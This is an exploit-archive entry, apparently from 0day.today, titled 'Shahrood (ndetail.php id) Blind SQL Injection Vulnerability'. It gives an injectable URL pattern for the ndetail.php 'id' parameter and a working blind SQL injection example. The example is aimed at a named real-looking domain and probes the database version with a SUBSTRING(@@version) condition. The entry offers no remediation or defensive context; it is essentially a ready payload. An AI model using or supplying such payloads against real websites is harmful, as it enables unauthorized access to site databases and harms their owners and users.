id: 4014
date: 11/01/2008
title: Shahrood (ndetail.php id) Blind SQL Injection Vulnerability
author: BazOka-HaCkEr
cves: 

===========================================================
Shahrood (ndetail.php id) Blind SQL Injection Vulnerability
===========================================================


Page 1
========================================================
==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability
========================================================
==> AuThOr : BazOka-HaCkEr
========================================================
==> Product Page :
==> http://www.shahrood.net/
==> ExplO!te :
==> www.TarGeT.com/ndetail.php?id=[SQL]
==> Example :
==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5
=========================================================


#  0day.today [2023-03-22]  #